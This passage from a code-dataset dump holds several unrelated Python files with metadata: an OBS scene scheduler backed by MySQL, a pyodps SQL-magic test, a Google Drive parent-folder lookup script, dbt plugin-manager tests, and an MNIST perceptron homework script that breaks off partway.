timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\trepeattime = repeattimenew + \",\" + str(int(repeattimenumber) - 
1)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate = '\" + new_date_object.strftime(\"%Y-%m-%d\") + \"', repeattime = '\" + repeattime + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattime))\n\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\tif not dayrun:\n\t\t\t\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\t\t\t\tconnectionthread.commit()\n\t\t\t\t\t\t\t\t\tprint(\"Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\ttime.sleep(1) #wait for next second.\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\ttime.sleep(0.25) #no need 100's loops a second\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tprint(\"connectionthread error\")\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": connectionthread error\")\n\t\t\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\t\ttimenow = int(time.strftime(\"%M%S\",time.localtime()))\n\t\t\t\t\t\tif timenow in exporttime:\n\t\t\t\t\t\t\tprint(\"export scenes\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetSceneList))\n\t\t\t\t\t\t\tUpdatescenes = False\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\t\t\t\tif timenow - 10 in exporttime:\n\t\t\t\t\t\t\tprint(\"export transitions\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetTransitionList))\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\tthread.start_new_thread(run, ())\n\n\t\tif __name__ == \"__main__\":\n\t\t\t#websocket.enableTrace(True)\n\t\t\tws = websocket.WebSocketApp(\"ws://{}:{}\".format(host, port),on_message = on_message,on_error = on_error,on_close = on_close)\n\t\t\tws.on_open = on_open\n\t\t\tws.run_forever()\n\n\texcept Exception:\n\t\tprint(\"Exception Connection error\")\n\t\tif writelog:\n\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Exception Connection error\")\n\t\ttime.sleep(10)\n\n\n\n\n\n", "sub_path": "obsschedulermySQL.py", "file_name": "obsschedulermySQL.py", "file_ext": "py", "file_size_in_byte": 13499, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 41, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 45, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 45, "usage_type": "attribute"}, {"api_name": 
"mysql.connector", "line_number": 45, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 50, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 50, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 58, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 61, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 61, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 64, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 64, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 69, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 69, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 70, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 73, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 98, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 104, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 104, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 153, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 153, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 154, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 154, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 156, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 166, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 166, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 175, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 175, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 181, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 181, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 186, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 191, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 193, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 199, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 199, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 200, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 200, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 207, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 213, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 213, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 214, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 214, "usage_type": "name"}, {"api_name": "datetime.datetime.combine", "line_number": 215, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 215, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 225, "usage_type": "call"}, {"api_name": "datetime.datetime", 
"line_number": 225, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 228, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 228, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 233, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 233, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 238, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 239, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 245, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 245, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 249, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 249, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 250, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 252, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 254, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 264, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 265, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 265, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 266, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 266, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 271, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 273, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 273, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 274, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 274, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 277, "usage_type": "call"}, {"api_name": "datetime.datetime.time", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 278, "usage_type": "name"}, {"api_name": "datetime.datetime.date", "line_number": 279, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 279, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 286, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 286, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 288, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 288, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 288, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 289, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 291, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 296, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 296, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 297, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 298, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 298, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 301, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 303, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 306, "usage_type": "call"}, {"api_name": "time.sleep", 
"line_number": 307, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 308, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 312, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 319, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 319, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 320, "usage_type": "call"}]} {"seq_id": "282783314", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 1999-2017 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom collections import namedtuple\n\nfrom odps.config import options\nfrom odps.tests.core import TestBase, tn\nfrom odps.compat import unittest\nfrom odps.ipython.magics import ODPSSql\n\ntry:\n import IPython\n has_ipython = True\nexcept ImportError:\n has_ipython = False\n\n\nclass Test(TestBase):\n def setUp(self):\n super(Test, self).setUp()\n self.old_use_instance_tunnel = options.tunnel.use_instance_tunnel\n\n def tearDown(self):\n super(Test, self).tearDown()\n options.tunnel.use_instance_tunnel = self.old_use_instance_tunnel\n\n @unittest.skipIf(not has_ipython, 'Skipped when no IPython is detected.')\n def testExecuteSql(self):\n FakeShell = namedtuple('FakeShell', 'user_ns')\n\n magic_class = ODPSSql(FakeShell(user_ns={}))\n magic_class._odps = self.odps\n\n test_table_name = tn('pyodps_t_test_sql_magic')\n test_content = [['line1'], ['line2']]\n self.odps.delete_table(test_table_name, if_exists=True)\n self.odps.create_table(test_table_name, 'col string', lifecycle=1)\n self.odps.write_table(test_table_name, test_content)\n\n options.tunnel.use_instance_tunnel = False\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n options.tunnel.use_instance_tunnel = True\n result = magic_class.execute('select * from %s' % test_table_name)\n self.assertListEqual(self._get_result(result), test_content)\n\n result = magic_class.execute('show tables')\n self.assertTrue(len(result) > 0)\n\n table_name = tn('pyodps_test_magics_create_table_result')\n magic_class.execute('create table %s (col string) lifecycle 1' % table_name)\n magic_class.execute('drop table %s' % table_name)\n", "sub_path": "odps/ipython/tests/test_magics.py", "file_name": "test_magics.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "odps.tests.core.TestBase", "line_number": 31, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 34, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 34, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 38, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 38, "usage_type": "name"}, {"api_name": "collections.namedtuple", "line_number": 42, "usage_type": "call"}, {"api_name": 
"odps.ipython.magics.ODPSSql", "line_number": 44, "usage_type": "call"}, {"api_name": "odps.tests.core.tn", "line_number": 47, "usage_type": "call"}, {"api_name": "odps.config.options.tunnel", "line_number": 53, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 53, "usage_type": "name"}, {"api_name": "odps.config.options.tunnel", "line_number": 57, "usage_type": "attribute"}, {"api_name": "odps.config.options", "line_number": 57, "usage_type": "name"}, {"api_name": "odps.tests.core.tn", "line_number": 64, "usage_type": "call"}, {"api_name": "odps.compat.unittest.skipIf", "line_number": 40, "usage_type": "call"}, {"api_name": "odps.compat.unittest", "line_number": 40, "usage_type": "name"}]} {"seq_id": "645543240", "text": "\n###########################################\n# DSFG ~ Katie House ~ 8/14/18\n# DESCTIPTION: List Google Drive links for Automan\n# INPUT: Google Drive File ID\n# OUTPUT: Google Drive Folder ID\n###########################################\n\nfrom __future__ import print_function\nfrom apiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file as oauth_file, client, tools\nfrom apiclient import errors\n\n\ndef print_parents(service, file_id):\n \"\"\"Print a file's parents.\n\n Args:\n service: Drive API service instance.\n file_id: ID of the file to print parents for.\n \"\"\"\n try:\n parents = service.parents().list(fileId=file_id).execute()\n for parent in parents['items']:\n print('File Id: %s' % parent['id'])\n except error:\n print('An error occurred: %s' % error)\n\ndef main(): \n store = oauth_file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('drive', 'v2', http=creds.authorize(Http()))\n\n # List all image links in a .txt file\n print_parents(service, '1_3g_aKodcJxYnuMZObePMN77AjnQlBmM')\n \nif __name__ == '__main__':\n main()\n ", "sub_path": "preprocessing/townhall-data/links-for-automan/get-folder-id.py", "file_name": "get-folder-id.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "oauth2client.file.Storage", "line_number": 31, "usage_type": "call"}, {"api_name": "oauth2client.file", "line_number": 31, "usage_type": "name"}, {"api_name": "oauth2client.client.flow_from_clientsecrets", "line_number": 34, "usage_type": "call"}, {"api_name": "oauth2client.client", "line_number": 34, "usage_type": "name"}, {"api_name": "oauth2client.tools.run_flow", "line_number": 35, "usage_type": "call"}, {"api_name": "oauth2client.tools", "line_number": 35, "usage_type": "name"}, {"api_name": "apiclient.discovery.build", "line_number": 36, "usage_type": "call"}, {"api_name": "httplib2.Http", "line_number": 36, "usage_type": "call"}]} {"seq_id": "294449459", "text": "import pytest\nfrom dbt.plugins import PluginManager, dbtPlugin, dbt_hook\nfrom dbt.plugins.manifest import PluginNodes, ModelNodeArgs\nfrom dbt.plugins.contracts import PluginArtifacts, PluginArtifact\n\n\nclass GetNodesPlugin(dbtPlugin):\n @dbt_hook\n def get_nodes(self) -> PluginNodes:\n nodes = PluginNodes()\n nodes.add_model(\n ModelNodeArgs(\n name=\"test_name\",\n package_name=self.project_name,\n identifier=\"test_identifier\",\n schema=\"test_schema\",\n )\n )\n return nodes\n\n\nclass GetArtifactsPlugin(dbtPlugin):\n @dbt_hook\n def get_manifest_artifacts(self, manifest) 
-> PluginArtifacts:\n return {self.project_name: PluginArtifact()}\n\n\nclass TestPluginManager:\n @pytest.fixture\n def get_nodes_plugin(self):\n return GetNodesPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_nodes_plugins(self, get_nodes_plugin):\n return [get_nodes_plugin, GetNodesPlugin(project_name=\"test2\")]\n\n @pytest.fixture\n def get_artifacts_plugin(self):\n return GetArtifactsPlugin(project_name=\"test\")\n\n @pytest.fixture\n def get_artifacts_plugins(self, get_artifacts_plugin):\n return [get_artifacts_plugin, GetArtifactsPlugin(project_name=\"test2\")]\n\n def test_plugin_manager_init_single_hook(self, get_nodes_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin])\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n def test_plugin_manager_init_single_hook_multiple_methods(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n assert len(pm.hooks) == 1\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 2\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugins[0].get_nodes\n assert pm.hooks[\"get_nodes\"][1] == get_nodes_plugins[1].get_nodes\n\n def test_plugin_manager_init_multiple_hooks(self, get_nodes_plugin, get_artifacts_plugin):\n pm = PluginManager(plugins=[get_nodes_plugin, get_artifacts_plugin])\n assert len(pm.hooks) == 2\n\n assert \"get_nodes\" in pm.hooks\n assert len(pm.hooks[\"get_nodes\"]) == 1\n assert pm.hooks[\"get_nodes\"][0] == get_nodes_plugin.get_nodes\n\n assert \"get_manifest_artifacts\" in pm.hooks\n assert len(pm.hooks[\"get_manifest_artifacts\"]) == 1\n assert pm.hooks[\"get_manifest_artifacts\"][0] == get_artifacts_plugin.get_manifest_artifacts\n\n def test_get_nodes(self, get_nodes_plugins):\n pm = PluginManager(plugins=get_nodes_plugins)\n nodes = pm.get_nodes()\n assert len(nodes.models) == 2\n\n def test_get_manifest_artifact(self, get_artifacts_plugins):\n pm = PluginManager(plugins=get_artifacts_plugins)\n artifacts = pm.get_manifest_artifacts(None)\n assert len(artifacts) == 2\n", "sub_path": "tests/unit/test_plugin_manager.py", "file_name": "test_plugin_manager.py", "file_ext": "py", "file_size_in_byte": 2990, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "dbt.plugins.dbtPlugin", "line_number": 7, "usage_type": "name"}, {"api_name": "dbt.plugins.manifest.PluginNodes", "line_number": 10, "usage_type": "call"}, {"api_name": "dbt.plugins.manifest.ModelNodeArgs", "line_number": 12, "usage_type": "call"}, {"api_name": "dbt.plugins.dbt_hook", "line_number": 8, "usage_type": "name"}, {"api_name": "dbt.plugins.manifest.PluginNodes", "line_number": 9, "usage_type": "name"}, {"api_name": "dbt.plugins.dbtPlugin", "line_number": 22, "usage_type": "name"}, {"api_name": "dbt.plugins.contracts.PluginArtifact", "line_number": 25, "usage_type": "call"}, {"api_name": "dbt.plugins.dbt_hook", "line_number": 23, "usage_type": "name"}, {"api_name": "dbt.plugins.contracts.PluginArtifacts", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 46, 
"usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 54, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 63, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 75, "usage_type": "call"}, {"api_name": "dbt.plugins.PluginManager", "line_number": 80, "usage_type": "call"}]} {"seq_id": "316764094", "text": "'''\nName: Sai Venkatesh Kurella\nCampus ID: VR62250\nCMSC 678 -Introduction to Machine Learning\nHomework-2\n\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plot\nfrom random import random,shuffle,sample\nfrom operator import itemgetter\n\n\ndef accuracy(testdata,actual_label,weights,bias): #accuracy function\n correct = 0\n for i in range(len(testdata)):\n pred = prediction(testdata[i],weights,bias)\n if pred == actual_label[i][0]: correct += 1\n return correct/float(len(testdata))*100\n\ndef prediction(inputs,weights,bias): #prediction fuction that handles inputs and weights\n activation = 0\n for input,weight in zip(inputs,weights):\n activation += input*weight + bias\n if activation > 0:\n return 1\n else:\n return -1\n\ndef perceptron(train_data,train_label,test_data,test_label,iteration): #perceptron function\n session = tf.compat.v1.Session()\n data_train = tf.compat.v1.placeholder(dtype=tf.float32,shape = [28*28])\n label_train = tf.compat.v1.placeholder(dtype= tf.float32,shape = [1])\n weight = tf.compat.v1.placeholder(dtype=tf.float32,shape=[28*28])\n\n weight = tf.multiply(data_train,label_train)\n\n weights = np.zeros(28*28)\n bias = 0\n for i in range(0,iteration):\n for j in range(0,len(train_data)):\n predict = prediction(train_data[j],weights,bias)\n if predict != train_label[j][0]:\n weights += session.run(weight,feed_dict={data_train:train_data[j],label_train:train_label[j]})\n bias += train_label[j][0]\n\n return accuracy(test_data,test_label,weights,bias),weights\n\ndef extract_data(train_images,train_labels,test_images,test_labels,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num1's\n if num_count < 500 and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(train_labels)):\n #extract only num2's\n if num_count < 500 and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num_count += 1\n num_count = 0\n #Testing data\n for i in range(len(test_labels)):\n if num_count < 500 and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num_count += 1\n num_count = 0\n for i in range(len(test_labels)):\n #extract only num2's\n if num_count < 500 and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num_count += 1\n return image_train,label_train,image_test,label_test\n\ndef extract_data_shuffled(train_images,train_labels,test_images,test_labels,count,num1,num2):\n image_train,label_train,image_test,label_test = [],[],[],[]\n #1 denoted by num1 and -1 denoted by num2\n #training data\n num1_count,num2_count = 0,0\n for i in range(len(train_labels)):\n #extract only num1's\n if num1_count < count and train_labels[i][num1] == 1:\n image_train.append(train_images[i])\n label_train.append([1])\n num1_count += 1\n #extract only 
num2's\n if num2_count < count and train_labels[i][num2] == 1:\n image_train.append(train_images[i])\n label_train.append([-1])\n num2_count += 1\n\n #shuffle training data\n train = list(zip(image_train,label_train))\n shuffle(train)\n image_train, label_train = zip(*train)\n\n #Testing data\n num1_count,num2_count = 0,0\n for i in range(len(test_labels)):\n if num1_count < count and test_labels[i][num1] == 1:\n image_test.append(test_images[i])\n label_test.append([1])\n num1_count += 1\n #extract only num2's\n if num2_count < count and test_labels[i][num2] == 1:\n image_test.append(test_images[i])\n label_test.append([-1])\n num2_count += 1\n #shuffle testing data\n test = list(zip(image_test,label_test))\n shuffle(test)\n image_test, label_test = zip(*test)\n\n return image_train,label_train,image_test,label_test\n\ndef accuracy_iteration(train_data,train_label,test_data,test_label,iteration,num1,num2):\n\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"accuracy_iteration%s_%s%s.png\" %(iteration,num1,num2)\n plot.savefig(plot_name)\n\ndef get_score(train_images,train_labels,test_images,test_labels,iteration,num1,num2):\n weights = perceptron(train_images,train_labels,test_images,test_labels,iteration)[1]\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(weights[i])\n else:\n weight_neg.append(0)\n\n pos_test, neg_test = [], []\n\n for i in range(len(test_labels)):\n if test_labels[i][0] == num1:\n pos_test.append(test_images[i])\n else:\n neg_test.append(test_images[i])\n #calculate score for num1 images\n score_pos = []\n for i in range(len(pos_test)):\n score = 0\n for j in range(len(pos_test[i])):\n score += abs(weight_pos[j] - pos_test[i][j])\n score_pos.append(score)\n #calculate score for num2 images\n score_neg = []\n for i in range(len(neg_test)):\n score = 0\n for j in range(len(neg_test[i])):\n score += abs(weight_neg[j] - neg_test[i][j])\n score_neg.append(score)\n\n pos_test_score = list(zip(pos_test,score_pos))\n pos_test_score = sorted(pos_test_score,key=itemgetter(1),reverse = True)\n #20 best num1\n best_pos = []\n best_pos_arr = pos_test_score[0:20]\n for i in range(len(best_pos_arr)):\n best_pos.append(best_pos_arr[i][0])\n\n worst_pos_arr = pos_test_score[-21:-1]\n worst_pos = []\n for i in range(len(worst_pos_arr)):\n worst_pos.append(worst_pos_arr[i][0])\n\n neg_test_score = list(zip(neg_test,score_neg))\n neg_test_score = sorted(neg_test_score,key = itemgetter(1),reverse = True)\n #20 best num2\n best_neg = []\n best_neg_arr = neg_test_score[0:20]\n for i in range(len(best_neg_arr)):\n best_neg.append(best_neg_arr[i][0])\n #20 worst num2\n worst_neg = []\n worst_neg_arr = neg_test_score[-21:-1]\n for i in range(len(worst_neg_arr)):\n worst_neg.append(worst_neg_arr[i][0])\n\n #image plot for num1 best 20\n for i in range(len(best_pos)):\n temp = []\n for j in range(0,len(best_pos[i]),28):\n temp.append(best_pos[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num1 worst 20\n for i in range(len(worst_pos)):\n temp = []\n for j in range(0,len(worst_pos[i]),28):\n temp.append(worst_pos[i][j:j+28])\n plot.subplot(4,5,i+1)\n 
plot.imshow(temp,'gray_r')\n    plt_name = \"worst_20_%s.png\"%(num1)\n    plot.savefig(plt_name)\n\n    #image plot for num2 best 20\n    for i in range(len(best_neg)):\n        temp = []\n        for j in range(0,len(best_neg[i]),28):\n            temp.append(best_neg[i][j:j+28])\n        plot.subplot(4, 5, i + 1)\n        plot.imshow(temp,'gray_r')\n    plt_name = \"best_20_%s.png\"%(num2)\n    plot.savefig(plt_name)\n\n    #image plot for num2 worst 20\n    for i in range(len(worst_neg)):\n        temp = []\n        for j in range(0,len(worst_neg[i]),28):\n            temp.append(worst_neg[i][j:j+28])\n        plot.subplot(4,5,i+1)\n        plot.imshow(temp,'gray_r')\n    plt_name = \"worst_20_%s.png\"%(num2)\n    plot.savefig(plt_name)\n\ndef visualize_weight_vector(train_data,train_label,test_data,test_label,iteration,num1,num2):\n    weights = perceptron(train_data,train_label,test_data,test_label,iteration)[1]\n\n    weight_pos, weight_neg = [], []\n\n    for i in range(len(weights)):\n        if weights[i] >= 0:\n            weight_pos.append(weights[i])\n        else:\n            weight_pos.append(0)\n\n    for i in range(len(weights)):\n        if weights[i] <= 0:\n            weight_neg.append(abs(weights[i]))\n        else:\n            weight_neg.append(0)\n    pos_weight,neg_weight = [],[]\n\n    for i in range(0,len(weight_pos),28):\n        pos_weight.append(weight_pos[i:i+28])\n    for i in range(0,len(weight_neg),28):\n        neg_weight.append(weight_neg[i:i+28])\n\n    plot.imshow(pos_weight,'gray_r')\n    plt_name = \"weight_%s.png\"%(num1)\n    plot.savefig(plt_name)\n    plot.imshow(neg_weight,'gray_r')\n    plt_name = \"weight_%s.png\"%(num2)\n    plot.savefig(plt_name)\n    \n    \ndef sorted_data_visualization(train_data,train_label,test_data,test_label,iteration,num1,num2):\n    x = [i*len(train_data) for i in range(iteration)]\n    y = []\n    for i in range(0,iteration):\n        y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n    plot.ylim(0,100)\n    plot.plot(x,y)\n    plot_name = \"sorted_accuracy_iteration%s%s.png\" %(num1,num2)\n    plot.savefig(plot_name)\n\ndef random_flip(train_data,train_label,test_data,test_label,iteration): #function for random flip\n    index = sample(range(1000), 100)\n\n    for i in index:\n        if train_label[i] == [1]:\n            train_label[i][0] = -1\n        else:\n            train_label[i][0] = 1\n    x = [i*len(train_data) for i in range(iteration)]\n    y = []\n    for i in range(0,iteration):\n        y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n    plot.ylim(0,100)\n    plot.plot(x,y)\n    plot.savefig('accuracy_random_flip.png')\n    return perceptron(train_data,train_label,test_data,test_label,iteration)[0]\n\n\n\ndef main():\n    print(\"Importing MNIST Dataset\")\n    mnist = 